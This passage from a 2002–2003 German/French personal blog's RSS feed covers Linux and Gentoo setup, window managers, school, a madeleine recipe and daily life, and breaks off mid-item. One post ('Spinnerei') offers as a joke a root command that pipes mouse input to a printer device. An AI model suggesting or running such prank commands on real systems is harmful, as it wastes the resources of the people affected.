  13092.    <description><![CDATA[Gerade bei <a href="http://kniebes.com/"><b>mk</b></a> entdeckt: <a href="https://web.archive.org/web/20030130153404/http://www.waimea.org/"><b>waimea</b></a>, ein WindowManager, der mich vor allem mit dem schönen Standard-Hintergrund überrascht hat *g*<br>Er soll auch mit BlackBox-Styles umgehen können und mit Transparenz noch mehr...<br><br><a href="https://blog.x-way.org/images/waimea.jpg"><b>Screenshot</b></a>
  13093. ]]></description>
  13094.    <content:encoded><![CDATA[Gerade bei <a href="http://kniebes.com/"><b>mk</b></a> entdeckt: <a href="https://web.archive.org/web/20030130153404/http://www.waimea.org/"><b>waimea</b></a>, ein WindowManager, der mich vor allem mit dem schönen Standard-Hintergrund überrascht hat *g*<br>Er soll auch mit BlackBox-Styles umgehen können und mit Transparenz noch mehr...<br><br><a href="https://blog.x-way.org/images/waimea.jpg"><b>Screenshot</b></a>
  13095. ]]></content:encoded>
  13096.  </item>
  13097.  
  13098.  <item>
  13099.    <title>Tunning</title>
  13100.    <link>https://blog.x-way.org/Linux/2003/01/21/Tunning.html</link>
  13101.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=256</guid>
  13102.    <dc:creator>Andreas Jaggi</dc:creator>
  13103.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  13104.    <pubDate>Tue, 21 Jan 2003 00:26:00 +0000</pubDate>
  13105.    <category domain="https://blog.x-way.org/Linux">Linux</category>
  13106.    <description><![CDATA[<a href="http://kniebes.com/"><b>mk</b></a> macht auf seinen Seiten nun eine Sammlung von Tutorials zu Linux und X11. Aber nicht 'normale' Tutorials sondern eher Tunning-Tutorials :-)
  13107. ]]></description>
  13108.    <content:encoded><![CDATA[<a href="http://kniebes.com/"><b>mk</b></a> macht auf seinen Seiten nun eine Sammlung von Tutorials zu Linux und X11. Aber nicht 'normale' Tutorials sondern eher Tunning-Tutorials :-)
  13109. ]]></content:encoded>
  13110.  </item>
  13111.  
  13112.  <item>
  13113.    <title>Spinnerei</title>
  13114.    <link>https://blog.x-way.org/Linux/2003/01/21/Spinnerei.html</link>
  13115.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=255</guid>
  13116.    <dc:creator>Andreas Jaggi</dc:creator>
  13117.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  13118.    <pubDate>Tue, 21 Jan 2003 00:23:00 +0000</pubDate>
  13119.    <category domain="https://blog.x-way.org/Linux">Linux</category>
  13120.    <description><![CDATA[Wer Spass haben will kann unter Linux mal folgendes ausprobieren:<pre>su
  13121. root-passwort
  13122. cat /dev/mouse &gt; /dev/Pfad zum Drucker
  13123. </pre>
  13124. ]]></description>
  13125.    <content:encoded><![CDATA[Wer Spass haben will kann unter Linux mal folgendes ausprobieren:<pre>su
  13126. root-passwort
  13127. cat /dev/mouse &gt; /dev/Pfad zum Drucker
  13128. </pre>
  13129. ]]></content:encoded>
  13130.  </item>
  13131.  
  13132.  <item>
  13133.    <title>Alimentarium</title>
  13134.    <link>https://blog.x-way.org/Food/2003/01/20/Alimentarium.html</link>
  13135.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=254</guid>
  13136.    <dc:creator>Andreas Jaggi</dc:creator>
  13137.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  13138.    <pubDate>Mon, 20 Jan 2003 20:32:00 +0000</pubDate>
  13139.    <category domain="https://blog.x-way.org/Food">Food</category>
  13140.    <description><![CDATA[Dimanche on était à <a href="http://www.vevey.ch/"><b>Vevey</b></a> dans l'<a href="http://www.alimentarium.ch/"><b>Alimentarium</b></a>. C'est une musée très intéressant et très recommandable!<br><br>On y pouvait faire des Madeleines avec cette recette:<br><br>Madeleines à l'huile d'olive<br>Selon une recette espagnole<br><br>Pour 9 à 12 moules<br><br>1 oeuf<br>110 g sucre<br>85 g huile d'olive<br>150 g farine<br>1/2 c. à café poudre à lever<br>75 ml de lait<br>1 pincée sel<br><br>Mélanger le sucre, l'oeuf, le sel.<br>Mélanger la poudre à lever avec la farine.<br>Incorporer alternativement le mélange poudre à lever-farine, l'huile, le lait.<br><br>Si on préfère une texture fine, ne pas trop battre la pâte.<br>Au contraire, pour qu'elle forme une belle boule sur le dessus, travailler la pâte au moins 5 min au batteur électrique.<br><br>Graisser les moules au pinceau avec un peu d'huile.<br>Remplir les moules aux trois quarts.<br><br>Cuisson: env. 15 min à 180°C
  13141. ]]></description>
  13142.    <content:encoded><![CDATA[Dimanche on était à <a href="http://www.vevey.ch/"><b>Vevey</b></a> dans l'<a href="http://www.alimentarium.ch/"><b>Alimentarium</b></a>. C'est une musée très intéressant et très recommandable!<br><br>On y pouvait faire des Madeleines avec cette recette:<br><br>Madeleines à l'huile d'olive<br>Selon une recette espagnole<br><br>Pour 9 à 12 moules<br><br>1 oeuf<br>110 g sucre<br>85 g huile d'olive<br>150 g farine<br>1/2 c. à café poudre à lever<br>75 ml de lait<br>1 pincée sel<br><br>Mélanger le sucre, l'oeuf, le sel.<br>Mélanger la poudre à lever avec la farine.<br>Incorporer alternativement le mélange poudre à lever-farine, l'huile, le lait.<br><br>Si on préfère une texture fine, ne pas trop battre la pâte.<br>Au contraire, pour qu'elle forme une belle boule sur le dessus, travailler la pâte au moins 5 min au batteur électrique.<br><br>Graisser les moules au pinceau avec un peu d'huile.<br>Remplir les moules aux trois quarts.<br><br>Cuisson: env. 15 min à 180°C
  13143. ]]></content:encoded>
  13144.  </item>
  13145.  
  13146.  <item>
  13147.    <title>Zeitvertrieb</title>
  13148.    <link>https://blog.x-way.org/Misc/2003/01/18/Zeitvertrieb.html</link>
  13149.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=253</guid>
  13150.    <dc:creator>Andreas Jaggi</dc:creator>
  13151.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  13152.    <pubDate>Sat, 18 Jan 2003 14:39:00 +0000</pubDate>
  13153.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  13154.    <description><![CDATA[So. Am Donnerstag war ich am Infotag der <a href="http://www.unibe.ch/"><b>Uni Bern</b></a>. Dieser war jedoch nicht so überzeugend wie der der <a href="http://www.ethz.ch/"><b>ETH Zürich</b></a>. So langsam bekomme ich das Gefühl, dass dieses Studieren doch nix für mich ist.<br><br>Am Abend dann noch in Bern Lord of the Rings II angeschaut, zum zweiten Mal, aber auf Englisch, was definitiv besser ist.<br><br>Nach einer kurzen Nacht dann am Freitag in der Schule so richtig ausgehängt :-)<br><br>Als ich nach dem Befeiern des 9. Tages Schule im neuen Jahr endlich nach Hause gefunden hatte und den Computer startete, ertönte ein mir unbekanntes Geräusch. Es klang, als würde ein Lüfter irgendwie falsch drehen, d.h. irgend eine anderes Teil abreiben. Ich lokaliseirte das Problem vermutlich beim Netzteil. Also schnell den Computer ausgeschaltet, Netzteil ausgebaut. Vorsichtig das Netzteil augeschraubt und dort die Lüfter ausgebaut (Ja, ich lebe noch ;-), mit dem Staubsauger ein bisschen den Dreck weggemacht, etwas an den Lüfter rumgedrückt, wieder alles zusammengebaut und den Computer eingeschaltet. Et voilà, der Computer läuft wieder mit der mir bekannten Dezibellzahl ;-)
  13155. ]]></description>
  13156.    <content:encoded><![CDATA[So. Am Donnerstag war ich am Infotag der <a href="http://www.unibe.ch/"><b>Uni Bern</b></a>. Dieser war jedoch nicht so überzeugend wie der der <a href="http://www.ethz.ch/"><b>ETH Zürich</b></a>. So langsam bekomme ich das Gefühl, dass dieses Studieren doch nix für mich ist.<br><br>Am Abend dann noch in Bern Lord of the Rings II angeschaut, zum zweiten Mal, aber auf Englisch, was definitiv besser ist.<br><br>Nach einer kurzen Nacht dann am Freitag in der Schule so richtig ausgehängt :-)<br><br>Als ich nach dem Befeiern des 9. Tages Schule im neuen Jahr endlich nach Hause gefunden hatte und den Computer startete, ertönte ein mir unbekanntes Geräusch. Es klang, als würde ein Lüfter irgendwie falsch drehen, d.h. irgend eine anderes Teil abreiben. Ich lokaliseirte das Problem vermutlich beim Netzteil. Also schnell den Computer ausgeschaltet, Netzteil ausgebaut. Vorsichtig das Netzteil augeschraubt und dort die Lüfter ausgebaut (Ja, ich lebe noch ;-), mit dem Staubsauger ein bisschen den Dreck weggemacht, etwas an den Lüfter rumgedrückt, wieder alles zusammengebaut und den Computer eingeschaltet. Et voilà, der Computer läuft wieder mit der mir bekannten Dezibellzahl ;-)
  13157. ]]></content:encoded>
  13158.  </item>
  13159.  
  13160.  <item>
  13161.    <title>mmm</title>
  13162.    <link>https://blog.x-way.org/Misc/2003/01/13/mmm.html</link>
  13163.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=252</guid>
  13164.    <dc:creator>Andreas Jaggi</dc:creator>
  13165.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  13166.    <pubDate>Mon, 13 Jan 2003 20:53:00 +0000</pubDate>
  13167.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  13168.    <description><![CDATA[unter <a href="https://web.archive.org/web/20030207160955/http://farfar.2038.com/english/loader.html"><b>milko music machine</b></a> kann man mal so richtig die puppen tanzen lassen *g*<br><br>ja, ich weiss schon, sind kühe, aber puppen passte besser in den satz ;-)
  13169. ]]></description>
  13170.    <content:encoded><![CDATA[unter <a href="https://web.archive.org/web/20030207160955/http://farfar.2038.com/english/loader.html"><b>milko music machine</b></a> kann man mal so richtig die puppen tanzen lassen *g*<br><br>ja, ich weiss schon, sind kühe, aber puppen passte besser in den satz ;-)
  13171. ]]></content:encoded>
  13172.  </item>
  13173.  
  13174.  <item>
  13175.    <title>MPlayer</title>
  13176.    <link>https://blog.x-way.org/Linux/2003/01/13/MPlayer.html</link>
  13177.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=251</guid>
  13178.    <dc:creator>Andreas Jaggi</dc:creator>
  13179.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  13180.    <pubDate>Mon, 13 Jan 2003 20:13:00 +0000</pubDate>
  13181.    <category domain="https://blog.x-way.org/Linux">Linux</category>
  13182.    <description><![CDATA[Nein, nicht MPlayer wie mplayer.exe !!!<br><br>Sondern <a href="http://www.mplayerhq.hu/homepage/"><b>MPlayer</b></a>. Wie vielerorts gesagt, kann auch ich mich daran anschliessen: geiles Tool ;-)<br><br>MPlayer mit aalib (daher die vielen Buchstaben ;-) : <a href="https://blog.x-way.org/images/aalib-mplayer.gif"><b>Screenshot</b></a>
  13183. ]]></description>
  13184.    <content:encoded><![CDATA[Nein, nicht MPlayer wie mplayer.exe !!!<br><br>Sondern <a href="http://www.mplayerhq.hu/homepage/"><b>MPlayer</b></a>. Wie vielerorts gesagt, kann auch ich mich daran anschliessen: geiles Tool ;-)<br><br>MPlayer mit aalib (daher die vielen Buchstaben ;-) : <a href="https://blog.x-way.org/images/aalib-mplayer.gif"><b>Screenshot</b></a>
  13185. ]]></content:encoded>
  13186.  </item>
  13187.  
  13188.  <item>
  13189.    <title>Welcome to Danemark!</title>
  13190.    <link>https://blog.x-way.org/Misc/2003/01/12/Welcome_to_Danemark.html</link>
  13191.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=250</guid>
  13192.    <dc:creator>Andreas Jaggi</dc:creator>
  13193.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  13194.    <pubDate>Sun, 12 Jan 2003 05:36:00 +0000</pubDate>
  13195.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  13196.    <description><![CDATA[Via <a href="https://web.archive.org/web/20030130142358/http://pzy.blogt.net/" title="pzy.blogt.net (archive.org)"><b>pzy</b></a> einen <a href="https://web.archive.org/web/20030401230212/http://olivierbazin.free.fr/party/nights/babez_php.htm"><b>Link</b></a> gefunden, welcher evtl. bei einigen Personen unserer Klasse, die Lust auf die Maturreise nach Dänemark steigert ;-)
  13197. ]]></description>
  13198.    <content:encoded><![CDATA[Via <a href="https://web.archive.org/web/20030130142358/http://pzy.blogt.net/" title="pzy.blogt.net (archive.org)"><b>pzy</b></a> einen <a href="https://web.archive.org/web/20030401230212/http://olivierbazin.free.fr/party/nights/babez_php.htm"><b>Link</b></a> gefunden, welcher evtl. bei einigen Personen unserer Klasse, die Lust auf die Maturreise nach Dänemark steigert ;-)
  13199. ]]></content:encoded>
  13200.  </item>
  13201.  
  13202.  <item>
  13203.    <title>The Hacker FAQ</title>
  13204.    <link>https://blog.x-way.org/Misc/2003/01/11/The_Hacker_FAQ.html</link>
  13205.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=249</guid>
  13206.    <dc:creator>Andreas Jaggi</dc:creator>
  13207.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  13208.    <pubDate>Sat, 11 Jan 2003 22:58:00 +0000</pubDate>
  13209.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  13210.    <description><![CDATA[<a href="http://www.plethora.net/%7Eseebs/faqs/hacker.html"><b>The Hacker FAQ</b></a>, gefunden bei <a href="https://web.archive.org/web/20030602203153/http://unix-girl.com/blog/"><b>kasia</b></a>.<br><br>Und nein, es ist nicht das was ihr denkt ;-)
  13211. ]]></description>
  13212.    <content:encoded><![CDATA[<a href="http://www.plethora.net/%7Eseebs/faqs/hacker.html"><b>The Hacker FAQ</b></a>, gefunden bei <a href="https://web.archive.org/web/20030602203153/http://unix-girl.com/blog/"><b>kasia</b></a>.<br><br>Und nein, es ist nicht das was ihr denkt ;-)
  13213. ]]></content:encoded>
  13214.  </item>
  13215.  
  13216.  <item>
  13217.    <title>Es druckt!</title>
  13218.    <link>https://blog.x-way.org/Linux/2003/01/11/Es_druckt.html</link>
  13219.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=248</guid>
  13220.    <dc:creator>Andreas Jaggi</dc:creator>
  13221.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  13222.    <pubDate>Sat, 11 Jan 2003 22:41:00 +0000</pubDate>
  13223.    <category domain="https://blog.x-way.org/Linux">Linux</category>
  13224.    <description><![CDATA[Mit Hilfe von <a href="https://web.archive.org/web/20030115073324/http://www.gentoo.de/gentoo/inhalte/doku/fortgeschritten/drucken/"><b>diesem Tutorial</b></a> habe ich nun mein <a href="http://www.gentoo.org/"><b>Gentoo</b></a> so eingerichtet, dass es mit meinem HP PSC 950 zusammen drucken kann.
  13225. ]]></description>
  13226.    <content:encoded><![CDATA[Mit Hilfe von <a href="https://web.archive.org/web/20030115073324/http://www.gentoo.de/gentoo/inhalte/doku/fortgeschritten/drucken/"><b>diesem Tutorial</b></a> habe ich nun mein <a href="http://www.gentoo.org/"><b>Gentoo</b></a> so eingerichtet, dass es mit meinem HP PSC 950 zusammen drucken kann.
  13227. ]]></content:encoded>
  13228.  </item>
  13229.  
  13230.  <item>
  13231.    <title>*schnarch*</title>
  13232.    <link>https://blog.x-way.org/Misc/2003/01/11/schnarch2.html</link>
  13233.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=247</guid>
  13234.    <dc:creator>Andreas Jaggi</dc:creator>
  13235.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  13236.    <pubDate>Sat, 11 Jan 2003 21:07:00 +0000</pubDate>
  13237.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  13238.    <description><![CDATA[So, heute mal wieder bis 16:30 Uhr geschlafen ...
  13239. ]]></description>
  13240.    <content:encoded><![CDATA[So, heute mal wieder bis 16:30 Uhr geschlafen ...
  13241. ]]></content:encoded>
  13242.  </item>
  13243.  
  13244.  <item>
  13245.    <title>humelela</title>
  13246.    <link>https://blog.x-way.org/Misc/2003/01/09/humelela.html</link>
  13247.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=246</guid>
  13248.    <dc:creator>Andreas Jaggi</dc:creator>
  13249.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  13250.    <pubDate>Thu, 09 Jan 2003 22:18:00 +0000</pubDate>
  13251.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  13252.    <description><![CDATA[Ce mot correspond &#224; "regarde vers l'avant". <br>Aujourd'hui en histoire bilingue il y avait un exposé contenant un chanson de l'Afrique de sud qui traite l'inégalité des femmes en Afrique, je pense que son title était ceci:<br><br>mamani humelela<br> <br>qui veut dire: maman, regarde vers l'avant.
  13253. ]]></description>
  13254.    <content:encoded><![CDATA[Ce mot correspond &#224; "regarde vers l'avant". <br>Aujourd'hui en histoire bilingue il y avait un exposé contenant un chanson de l'Afrique de sud qui traite l'inégalité des femmes en Afrique, je pense que son title était ceci:<br><br>mamani humelela<br> <br>qui veut dire: maman, regarde vers l'avant.
  13255. ]]></content:encoded>
  13256.  </item>
  13257.  
  13258.  <item>
  13259.    <title>Schnell</title>
  13260.    <link>https://blog.x-way.org/Linux/2003/01/08/Schnell.html</link>
  13261.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=245</guid>
  13262.    <dc:creator>Andreas Jaggi</dc:creator>
  13263.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  13264.    <pubDate>Wed, 08 Jan 2003 22:22:00 +0000</pubDate>
  13265.    <category domain="https://blog.x-way.org/Linux">Linux</category>
  13266.    <description><![CDATA[Jetz hab ich doch erst <a href="http://www.waterwave.ch/weblog/detail.php?id=244"><b>vorhin</b></a> das ganze System aktualisiert, inklusive PHP (von 4.2.3 auf 4.3.0-r1). Und nun schaue ich wieder und es sind schon wieder fast 10 Updates verfügbar (z.B. PHP 4.3.0-r2). Manchmal ist mir <a href="http://www.gentoo.org/"><b>Gentoo</b></a> doch ein bisschen zu schnell ;-)
  13267. ]]></description>
  13268.    <content:encoded><![CDATA[Jetz hab ich doch erst <a href="http://www.waterwave.ch/weblog/detail.php?id=244"><b>vorhin</b></a> das ganze System aktualisiert, inklusive PHP (von 4.2.3 auf 4.3.0-r1). Und nun schaue ich wieder und es sind schon wieder fast 10 Updates verfügbar (z.B. PHP 4.3.0-r2). Manchmal ist mir <a href="http://www.gentoo.org/"><b>Gentoo</b></a> doch ein bisschen zu schnell ;-)
  13269. ]]></content:encoded>
  13270.  </item>
  13271.  
  13272.  <item>
  13273.    <title>Rundumerneuern</title>
  13274.    <link>https://blog.x-way.org/Linux/2003/01/08/Rundumerneuern.html</link>
  13275.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=244</guid>
  13276.    <dc:creator>Andreas Jaggi</dc:creator>
  13277.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  13278.    <pubDate>Wed, 08 Jan 2003 16:48:00 +0000</pubDate>
  13279.    <category domain="https://blog.x-way.org/Linux">Linux</category>
  13280.    <description><![CDATA[Auf <a href="https://blog.x-way.org/images/emergeupworld.jpg"><b>diesem Screenshot</b></a> sieht man wie mittels <pre>emerge -u world</pre> die installierten Programme aktualisiert werden.<br><br>Das Theme für <a href="http://fluxbox.org/"><b>fluxbox</b></a> nennt sich <b>SLdr</b> und stammt von <a href="http://kniebes.com/"><b>mk</b></a>. Den Hintergrund kann man <a href="https://blog.x-way.org/images/pilat.jpg"><b>hier</b></a> finden.
  13281. ]]></description>
  13282.    <content:encoded><![CDATA[Auf <a href="https://blog.x-way.org/images/emergeupworld.jpg"><b>diesem Screenshot</b></a> sieht man wie mittels <pre>emerge -u world</pre> die installierten Programme aktualisiert werden.<br><br>Das Theme für <a href="http://fluxbox.org/"><b>fluxbox</b></a> nennt sich <b>SLdr</b> und stammt von <a href="http://kniebes.com/"><b>mk</b></a>. Den Hintergrund kann man <a href="https://blog.x-way.org/images/pilat.jpg"><b>hier</b></a> finden.
  13283. ]]></content:encoded>
  13284.  </item>
  13285.  
  13286.  <item>
  13287.    <title>Am Umsteigen</title>
  13288.    <link>https://blog.x-way.org/Linux/2003/01/08/Am_Umsteigen.html</link>
  13289.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=243</guid>
  13290.    <dc:creator>Andreas Jaggi</dc:creator>
  13291.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  13292.    <pubDate>Wed, 08 Jan 2003 16:29:00 +0000</pubDate>
  13293.    <category domain="https://blog.x-way.org/Linux">Linux</category>
  13294.    <description><![CDATA[Ich hab grad 'E: (Games)' plattgemacht und mit <pre>mke2fs -j /dev/hda6</pre> und diesem Eintrag in /etc/fstab <pre>/dev/hda6 /usr/local/games ext3 noatime,user 0 0</pre> wiederbelebt ;-)
  13295. ]]></description>
  13296.    <content:encoded><![CDATA[Ich hab grad 'E: (Games)' plattgemacht und mit <pre>mke2fs -j /dev/hda6</pre> und diesem Eintrag in /etc/fstab <pre>/dev/hda6 /usr/local/games ext3 noatime,user 0 0</pre> wiederbelebt ;-)
  13297. ]]></content:encoded>
  13298.  </item>
  13299.  
  13300.  <item>
  13301.    <title>Eisig</title>
  13302.    <link>https://blog.x-way.org/Misc/2003/01/07/Eisig.html</link>
  13303.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=242</guid>
  13304.    <dc:creator>Andreas Jaggi</dc:creator>
  13305.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  13306.    <pubDate>Tue, 07 Jan 2003 16:57:00 +0000</pubDate>
  13307.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  13308.    <description><![CDATA[Als ich heute Morgen um 10 vor 6 frischgeduscht zum Bahnhof rannte, musste ich feststellen, dass meine noch nicht ganz getrockneten Haare gefrohren waren!
  13309. ]]></description>
  13310.    <content:encoded><![CDATA[Als ich heute Morgen um 10 vor 6 frischgeduscht zum Bahnhof rannte, musste ich feststellen, dass meine noch nicht ganz getrockneten Haare gefrohren waren!
  13311. ]]></content:encoded>
  13312.  </item>
  13313.  
  13314.  <item>
  13315.    <title>LingoFox (r)</title>
  13316.    <link>https://blog.x-way.org/School/2003/01/06/LingoFox_r.html</link>
  13317.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=241</guid>
  13318.    <dc:creator>Andreas Jaggi</dc:creator>
  13319.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  13320.    <pubDate>Mon, 06 Jan 2003 22:23:00 +0000</pubDate>
  13321.    <category domain="https://blog.x-way.org/School">School</category>
  13322.    <description><![CDATA[<a href="https://web.archive.org/web/20030108222722/http://www.monoklon.de/index.php"><b>Michael</b></a> hat eine evtl. sehr hilfreiche Website gefunden: <a href="https://web.archive.org/web/20030124010032/http://konjugator.lingofox.de/index.htm"><b>Verben konjugieren mit LingoFox dem Konjugator</b></a><br><br>Leider darf man während den Franz.-Proben nicht ins Internet *g*
  13323. ]]></description>
  13324.    <content:encoded><![CDATA[<a href="https://web.archive.org/web/20030108222722/http://www.monoklon.de/index.php"><b>Michael</b></a> hat eine evtl. sehr hilfreiche Website gefunden: <a href="https://web.archive.org/web/20030124010032/http://konjugator.lingofox.de/index.htm"><b>Verben konjugieren mit LingoFox dem Konjugator</b></a><br><br>Leider darf man während den Franz.-Proben nicht ins Internet *g*
  13325. ]]></content:encoded>
  13326.  </item>
  13327.  
  13328.  <item>
  13329.    <title>Schlaf?</title>
  13330.    <link>https://blog.x-way.org/Misc/2003/01/06/Schlaf1.html</link>
  13331.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=240</guid>
  13332.    <dc:creator>Andreas Jaggi</dc:creator>
  13333.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  13334.    <pubDate>Mon, 06 Jan 2003 00:27:00 +0000</pubDate>
  13335.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  13336.    <description><![CDATA[Heute hab ich von etwa 01:30 bis 16 Uhr geschlafen, 15.5 Stunden! Das ist neuer Rekord! ;-)
  13337. ]]></description>
  13338.    <content:encoded><![CDATA[Heute hab ich von etwa 01:30 bis 16 Uhr geschlafen, 15.5 Stunden! Das ist neuer Rekord! ;-)
  13339. ]]></content:encoded>
  13340.  </item>
  13341.  
  13342.  <item>
  13343.    <title>Es ist wieder soweit</title>
  13344.    <link>https://blog.x-way.org/Linux/2003/01/01/Es_ist_wieder_soweit.html</link>
  13345.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=239</guid>
  13346.    <dc:creator>Andreas Jaggi</dc:creator>
  13347.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  13348.    <pubDate>Wed, 01 Jan 2003 13:43:00 +0000</pubDate>
  13349.    <category domain="https://blog.x-way.org/Linux">Linux</category>
  13350.    <description><![CDATA[Mein Gentoo ist wieder einmal neu kompiliert. Diesmal hab ich mir die Zeit genomen und <a href="http://www-105.ibm.com/developerworks/education.nsf/linux-onlinecourse-bytitle/3100FF4795B3F31F86256AF70056FDB3?OpenDocument"><b>dieses Tutorial</b></a> über XFree86 ganz durchgelesen. Daher weiss ich nun, wie man den Windowmanager einstellt. Vermutlich kommt es auch daher, dass ich GNOME noch nie gestartet habe sondern die ganze Zeit mit <a href="http://www.fluxbox.org"><b>Fluxbox</b></a> arbeitet ;-)<br><br><a href="https://blog.x-way.org/images/fluxbox.jpg"><b>Einen Screenshot</b></a> gibt's natürlich auch.
  13351. ]]></description>
  13352.    <content:encoded><![CDATA[Mein Gentoo ist wieder einmal neu kompiliert. Diesmal hab ich mir die Zeit genomen und <a href="http://www-105.ibm.com/developerworks/education.nsf/linux-onlinecourse-bytitle/3100FF4795B3F31F86256AF70056FDB3?OpenDocument"><b>dieses Tutorial</b></a> über XFree86 ganz durchgelesen. Daher weiss ich nun, wie man den Windowmanager einstellt. Vermutlich kommt es auch daher, dass ich GNOME noch nie gestartet habe sondern die ganze Zeit mit <a href="http://www.fluxbox.org"><b>Fluxbox</b></a> arbeitet ;-)<br><br><a href="https://blog.x-way.org/images/fluxbox.jpg"><b>Einen Screenshot</b></a> gibt's natürlich auch.
  13353. ]]></content:encoded>
  13354.  </item>
  13355.  
  13356.  <item>
  13357.    <title>2k3</title>
  13358.    <link>https://blog.x-way.org/Misc/2002/12/31/2k3.html</link>
  13359.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=238</guid>
  13360.    <dc:creator>Andreas Jaggi</dc:creator>
  13361.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  13362.    <pubDate>Tue, 31 Dec 2002 23:59:01 +0000</pubDate>
  13363.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  13364.    <description><![CDATA[Bonne année!
  13365. ]]></description>
  13366.    <content:encoded><![CDATA[Bonne année!
  13367. ]]></content:encoded>
  13368.  </item>
  13369.  
  13370.  <item>
  13371.    <title>2k3 (wie beim UT ;-)</title>
  13372.    <link>https://blog.x-way.org/Misc/2002/12/31/2k3_wie_beim_UT_-.html</link>
  13373.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=237</guid>
  13374.    <dc:creator>Andreas Jaggi</dc:creator>
  13375.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  13376.    <pubDate>Tue, 31 Dec 2002 23:59:00 +0000</pubDate>
  13377.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  13378.    <description><![CDATA[Frohes Neues Jahr!<br>Das mit den Vorsätzen lassen wir jetzt mal ;-)
  13379. ]]></description>
  13380.    <content:encoded><![CDATA[Frohes Neues Jahr!<br>Das mit den Vorsätzen lassen wir jetzt mal ;-)
  13381. ]]></content:encoded>
  13382.  </item>
  13383.  
  13384.  <item>
  13385.    <title>Phiki Wiki pour tous</title>
  13386.    <link>https://blog.x-way.org/Misc/2002/12/30/Phiki_Wiki_pour_tous.html</link>
  13387.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=236</guid>
  13388.    <dc:creator>Andreas Jaggi</dc:creator>
  13389.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  13390.    <pubDate>Mon, 30 Dec 2002 00:55:00 +0000</pubDate>
  13391.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  13392.    <description><![CDATA[Sur <a href="https://phiki.x-way.org/"><b>https://phiki.x-way.org/</b></a> vous pouvez écrire, créer, jouer, bavarder, politiser, publier ...<br><br>Faites-le! ;-)
  13393. ]]></description>
  13394.    <content:encoded><![CDATA[Sur <a href="https://phiki.x-way.org/"><b>https://phiki.x-way.org/</b></a> vous pouvez écrire, créer, jouer, bavarder, politiser, publier ...<br><br>Faites-le! ;-)
  13395. ]]></content:encoded>
  13396.  </item>
  13397.  
  13398.  <item>
  13399.    <title>Spielwiese</title>
  13400.    <link>https://blog.x-way.org/Misc/2002/12/30/Spielwiese.html</link>
  13401.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=235</guid>
  13402.    <dc:creator>Andreas Jaggi</dc:creator>
  13403.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  13404.    <pubDate>Mon, 30 Dec 2002 00:50:00 +0000</pubDate>
  13405.    <category domain="https://blog.x-way.org/Misc">Misc</category>
